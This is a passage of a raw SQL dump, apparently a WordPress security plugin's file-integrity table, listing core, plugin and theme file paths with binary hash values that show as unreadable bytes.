�ӊ%\Z�pã��j.�S','',0,'?'),('0�ň����}m�X9�q','wp-content/plugins/wp-cerber/assets/flags/zm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\|e�D�gk�^���','�yЩ&VUą;�}��D4E���3�)\\','',0,'?'),('0��X���l3�泈\n','wp-content/themes/magazine-hoot/include/admin/images/premium-googlefonts.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{=S��V�<�#j�pm�','��po�\'죩z�G�x��F��c\\7C��FCHu�','',0,'?'),('0����I��\Z8�\'�x','wp-content/plugins/wp-cerber/assets/flags/tk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȕ��n��e�Y�T��','I��/�:���5s ;�#bi)��4k ����','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���%��K\Z��{�V','���k��^�qݵ;�e8�K���=AaЮM_���','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('1!� I��<Em#','wp-content/plugins/wp-cerber/assets/flags/ee.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��h�~�\rO�����','��R�Bᣛ�݇84ɐ6B����\0ȸ�:l-�IB','',0,'?'),('1��TA�ө���','wp-content/themes/magazine-hoot/hybrid/extend/includes/color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ý���\0�h&�|�','ώ�!\\�ij|ޝgc v7��gѿ@��\0����<','',0,'?'),('1���b�[�^.','wp-content/themes/magazine-hoot/hybrid/customize/control-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�8��^|�Ԏwh�','N�¯�՝���E�wijf��~h��1{�C�{','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��a2P���KQ��i\"','����F�;L��_����-������-��N��x','',0,'?'),('1A����,\ns����v','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��)��ɾNS(�! 4Z','��/�[��f	�nU���!79�8^94����M','',0,'?'),('1G�[��D��qW�t��','wp-content/plugins/wp-cerber/assets/flags/gy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��B��}��>_�','L�:�,���B[���aa<���w�*@������','',0,'?'),('1^��BsCZU*��M�>','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o�-�6��ѥ�p|','���dd�^�#QҒ\Z�#q�^�Ɠ�J�w�','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~݋','',0,'?'),('1�3\r\rI��W��\\��','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ov_J�ex��	V-\r','�߬a�#�1Ȫ���s�9��;�\0e�oH߉T��','',0,'?'),('1�7�F0ܩ��^ �l','wp-content/plugins/wp-cerber/admin/cerber-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��ေ�yHj�[��','Sʭ��7:Y:`�ǝ�p%��G�%����G�','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7����nb�A�x��','+׺\r��O��2UP^kD\0(���c��J�<','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('1�ه�җ\"R���\"','wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�HO�N��Z,�L��T',',_��ּ �����+%��$G\rK��?�����','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m�	\'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ���լިF��','��w���R�x��$�r�դɯ�D���`.��u','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r��T��tu�','yA�y3�h�|�Г�L�����i=���>�j','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9����\n)��Fu','4�WZ�!VH-~~`⟜�is�G�m@�7�n�','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T/�mWeP�X<x�}�t','��[:�{A�I��BY��C&���Op\'6�','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����؉��	�m/J�~','�}�\r:�jg���E�˾V(]h�x��t','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2x�	�<��Q䃚V\0','wp-content/themes/magazine-hoot/widget/announce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��v\nx�D�@C�0�','�p�I[_2Z�W���{�)��6A�����o','',0,'?'),('2�E���γŷ���','wp-content/plugins/wp-cerber/assets/flags/ps.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��P-�6@%','%�AD���E���P�Ǖ��|�u��Ć�C�!','',0,'?'),('2�|�΢(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K8ۨ��)','.�%�����]:/$zԢ��S�_�)kER��','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��J�cW�&��Y�','i�+W�M�E4�\n�#S�-^�?�ݻ��,�9','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f��u���ן)','���Vb�p�O+	�N$�uw���}�h�\"�','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('2�X��l#�[��_\nk','wp-content/themes/magazine-hoot/hybrid/extend/includes/styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�\\�`�-��%J','�w��E��T�����1��k9��?AOtG <K�','',0,'?'),('3��J��c$�\Z+','wp-content/plugins/wordfence/js/date.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('3)e/`���/\r�Ph=','wp-content/plugins/wp-cerber/assets/flags/bf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��>��=��$�.��','�Ȋ:��h�.�n(xD⃪F\"{`iN�\0#��','',0,'?'),('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�R?�\"�`�$�`','!	�n�‚�śU7B��5gr�	1�*;R�','',0,'?'),('3fDr)�{��w��	#','wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('3h���\"I+[��E','wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԓs� 5C�ɚ�b��LF','���ʿ�Iv�+>Y�h�b�F\\x��v�.wT','',0,'?'),('3k��oW�5	k[mq','wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W_��T�ӰI�Y�֛','2ɟ��tb;6@\Zq\'��Q��H�j	��m���ѫ�','',0,'?'),('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('3r0�沂!^��Ț��>','wp-content/themes/magazine-hoot/template-parts/footer-postfooter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�V��ΫC\0�V��','{ a!_;,�8���#�����b��I#�\0}�U�','',0,'?'),('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=��p�5%�h$�*�','s�B`]��b��p�M���0�\\�s�w�D{����','',0,'?'),('3�S�#ǣ+Ke�\0Ⱦ','wp-content/plugins/wp-cerber/assets/flags/la.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3MU\'���\Zkr�c&��','[�lԬ�`�l !_���>�kwd�X��p���_','',0,'?'),('3��JΑTg�0��\'e','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4���uB\nE�#@��W',')r�xUYJ�;hpjH{\\����1\'#�� s�','',0,'?'),('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('3��ng\0��\\\0	�W','wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('4\n��	m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�+e��[e�ϙ�fW�','QA��u&�{Ai��XP�K�[�{0�Q�k��','',0,'?'),('4��*�ބR�∳H�','wp-content/themes/magazine-hoot/js/jquery.lightSlider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�s��%-�ȓ(�L','X8��,�[�M��X>�\"yM�o��4�','',0,'?'),('4�31@�*r�����8','wp-includes/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ś�L�\\�Pڜ�U','c>�5�o�������𽃐�_�T9�L~;�e7�','',0,'?'),('48�Vt���+^X�','wp-includes/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!	/�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('4;`߯z�?	�{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h»����$\ZPfX�','�ƪɝ����U[Z~��^�d�\'�X�ٮ���','',0,'?'),('4AI�n09��7c`','wp-includes/js/tinymce/utils/validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CL�1?o+;���{Y�','k�H��;�\0�kC�s�	\'K�#45+eE|���0','',0,'?'),('4F��/�{�Y�{^�i','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0=�cEx\"~���-:�','��*���r7��Ru\n4��]?1�����b��','',0,'?'),('4To���iE��t�','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�I�SD���D\Z.{','o�N�Wl����y�����]�����\'�����','',0,'?'),('4a�[I�}���H�m)','wp-admin/css/deprecated-media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M>��_�^�����9F','.��*�AU�u0�	\'�Q�2˻�=�x4w��g�','',0,'?'),('4���9�7��Tb��~~','wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;0��#�B���n','ѹ�T)��f�-D�/kFb��y�����H�','',0,'?'),('4ڂ��L$�,K[�u��','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�8\nP*�a|/ٳK','XdB�c\0���2��Ý��c���g�������','',0,'?'),('5�?��y��<�2�','wp-admin/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o0�Dk�ģ\'-5�S�','����r�?�\0��1�}2�IDse�K���W�k�','',0,'?'),('5.=���d)<p�eu�s^','wp-includes/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vr���Β;Y���o$Y','�����}� Y�1q$VY�8k\rt �o�ny�w�','',0,'?'),('58�d�`S61K>ۮ�v','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cg�ͤa�p�:^���','׵Z���#��#�z�2�$R�6C����1���','',0,'?'),('5C�)\nWu�꽝/F�cK','wp-includes/js/plupload/wp-plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K%A�};܃q:{��','+8k�����/S*15xB�L6R�P���4�5�','',0,'?'),('5S{�TƁ���e�/�','wp-includes/class-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;C\r��7�l����','q	��MQ�Anq2Y|��]�d�]����R!(�','',0,'?'),('5Xܨ�*���{L0%�','wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Q5�\Z��*y�y!�s','��J���\"qUK�a��\'1�_N�XG�`揧W>','',0,'?'),('5Z����Sμ�v�`6�9','wp-includes/version.php',0,'��|�\ZelǢc�$�\Z','��|�\ZelǢc�$�\Z','H70wN1��_\n�T?a��(-l�]�g��9','',0,'?'),('5\\h>��w	���N�','wp-includes/registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('5`�]\\ͭi\0���\ZJ�T','wp-includes/class-wp-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�����\\�OR���Z','�`7t/���}�z����f!��l=�,�8tS0F�]','',0,'?'),('5��92���^�%<��','wp-admin/edit-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�4\0��bo���K3{�','����?��bG�,��*>LPmy�������)�Q','',0,'?'),('5�7�N	C=��-��c�','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�D�K���zS§0','N�Q�*��TZ%P��%���jܑtZn/�','',0,'?'),('5�#t�5R�шK����','wp-content/wflogs/config-livewaf.php',0,'\0��#���O�7���~\0','\0��#���O�7���~\0','�c!75|�,lX.��_f��,2�k����C��','',0,'?'),('6����X/��HL','wp-includes/js/mediaelement/wp-playlist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����X�l\"�o�','�/=àBAo&���I�1��]k~�N���','',0,'?'),('6c�k���6_sx$�>\"','wp-content/plugins/wp-cerber/assets/flags/et.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8������ZltS���\"','c��/s]\Z�`R��ꩧ`���֌�E�����P�','',0,'?'),('6;I(�H�m�%��f�','wp-admin/css/farbtastic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\n���)�{��','T�=�Y#��[���vr�H�ia��R���','',0,'?'),('6W(\'�����P�4�','wp-content/plugins/wp-cerber/assets/flags/gn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������M�MH����,','����nr���A�[/�Á����*f|DeTJC�J','',0,'?'),('6[f�9�?�� _�','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&���Ɍ����ԔQ<','1���Nߗ����׍?*�i�í!F�Mp�9^.','',0,'?'),('6c�b��kk��i3�@�H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)VUL��C_�V8�','����EL\r�\";�m[�+G��G��k4+)','',0,'?'),('6�]j�v�W�k\r3-�','wp-admin/load-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ft_ov�в���','f�k�!RG4�;��jhnut֭���ʭd\ZW�n','',0,'?'),('6��ƌ���C���+','wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('6�Y\r�x]��fmJ?','wp-content/themes/magazine-hoot/include/theme-setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2������ԍCn�','l���ً�o�V�_rΒ<�oa\\����u�Z�y','',0,'?'),('6̠,��_���q��u�','wp-admin/includes/class-wp-filesystem-ftpext.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0F������\"��e�	','<̌��ܹW��p�LB o�;$2�ȴ��/%g','',0,'?'),('6٨	�:{�^D�','wp-includes/js/jquery/ui/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('7\"��妿W�\r��ѽ�','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad��_7����$a','�.��ޖ6��I$��LdW�|�]�E�y\"��','',0,'?'),('76�6? X,��-�6�)�','wp-content/plugins/wp-cerber/assets/flags/eu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t;�zC�oػ�@���','��m��2����A�,��%(�#��%c)�+�w','',0,'?'),('7I��›�����U��','wp-content/themes/magazine-hoot/include/admin/images/content-block-style-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�C~L��F`��ҋ','\0���k��|�6���8��Bq�<���� �','',0,'?'),('7r��uF��@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�K_J�2Cmcͭ�t�','D��jy��,�Lw�a� <U��� ����S','',0,'?'),('7|oOU���z\0Ef���','wp-admin/network/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�;G_bu\'\\','�v,I/L^���ww\ZX1�2�y�T�ɣI��~','',0,'?'),('7�Gj��F@n�9��\0�','wp-admin/.bt',0,'�*�_����\\�+-T','�*�_����\\�+-T','f�*�Bo_:�g�x�I��r!mK\07���E','',0,'?'),('7�%Wy~׹P?�x��','wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('7���o^l�:���B','wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('7�c�¢)��S�eb�','wp-includes/js/jquery/ui/menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��\"f_�2�eg�','�{�B��x��\r;f	�2��4�/����4E�','',0,'?'),('7�c�.$P!�\"�򹚆','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���j��_�ˊR�2','*��-�9�.���HGO6/�L�):�C�d�z�','',0,'?'),('7�ʅ����	��;h��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iL�v.\\�Mug4�\rf','Ns�:mC������/��Zp�w����z����','',0,'?'),('7����T#Z�	,79�','wp-content/themes/magazine-hoot/hybrid/inc/template-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G����<4k�{61�','�<�[JG�7fwwz\n\"��\"f}��}��?','',0,'?'),('7���k�X�f�Xm�S�','wp-includes/js/dist/vendor/wp-polyfill-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('7�2��_R�D��;n�','wp-includes/blocks/block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�,:�&\0�:�(�	','1�Cf����>�-K�J\"��1�%�I���P3�Z�','',0,'?'),('8=�I��a�%��k�~�','wp-admin/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ο��1S���&�5�F','�),_Ե�DWڪt�q��j\'Oy����>A\\�','',0,'?'),('8?6B�\r��pl2�R�x','wp-content/wflogs/config-synced.php',0,'2s��}��Fj�)E�:�v','2s��}��Fj�)E�:�v','��/7)aΜZ%�<o&@��x;,��32��	X','',0,'?'),('8P֧�\Z�HGE}8�','wp-includes/Requests/Exception/HTTP/306.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('8Y���v���C�[,��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:\0��>������}LQ\0','���_U\0]q=Չ��f�\\�/�	@d��\r�+v�*(','',0,'?'),('8�R6�DH��q�-{�:`','wp-admin/includes/translation-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>D�glM�<�mg�','\r�[��8*�5n݊��Pc���^8d%?f','',0,'?'),('8�@)��6yg[y�sQR','wp-admin/css/deprecated-media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��\"z���Pgw','���I�\'�Hk���,���1��5!u�.���2','',0,'?'),('8ÛZE�Q$}UP�T��','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�铇�ܙ~�\r�m','%&��9�	/D�XG�؞�߇��U�����4','',0,'?'),('8�Gxo\\��U���[�','wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_����H��o9�{','>����k���Wo��H�[G�.�l)簥0','',0,'?'),('8ܞt��\Zw�Nxa��','wp-includes/class-wp-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('9�\r5\'X���>?�','wp-includes/js/customize-preview-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('9ψ[�1d{���@','wp-includes/class.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���vz��4�<q\Z�','���/U��V�tD��b}��F�9S��z���','',0,'?'),('9:��d�o\n��p`Ry��','wp-includes/js/tinymce/langs/wp-langs-en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('9k�sB��=}��TŃc7','wp-includes/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('9v@�o�nr�����*','wp-content/plugins/wp-cerber/assets/flags/am.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�(v���ߩM�$Cݣn','�c4�n�6W����V�^�:�s��ݺ#����','',0,'?'),('9|����nRo��Bt[�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f����rQ��N�L7\\�','!�/Բ�*<5����E��~��GYy&`��','',0,'?'),('9�} B^��?	�\"�','wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',:q���Hn<4���@','���جK��\'��\r<S��K�\"����6i+��9','',0,'?'),('9��)�&��{Sd�G','wp-content/plugins/wp-cerber/assets/wp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\0i�L�1���_��','��{Ո��R3i²�V���J}��0Ʀ�e\'\n	�','',0,'?'),('9ĠZq:j\nU�9(\Z\0��','wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�x[��/�؟[�N�','�S���3�hA���Θ����R)�+}�A���6','',0,'?'),('9ՍҢ��9��d\r�Y','wp-includes/ID3/license.commercial.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('9שyƣ�hw��','wp-includes/pomo/pomo/entry.php',0,'0�w3aAr���6VH%�2','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B��	�O4AO7','',0,'?'),('9��s�3�SZ,p�8g','wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(':{���{7�9����','wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�gg��&ёb�� ��','(C<M�d*2Ƚ��*�N�t�n����T~��\ZW','',0,'?'),(':�|L�H6(��c�g��','wp-includes/ID3/module.audio.ogg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),(':1�(�)p]V1�-ȩ�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qDL���a�[	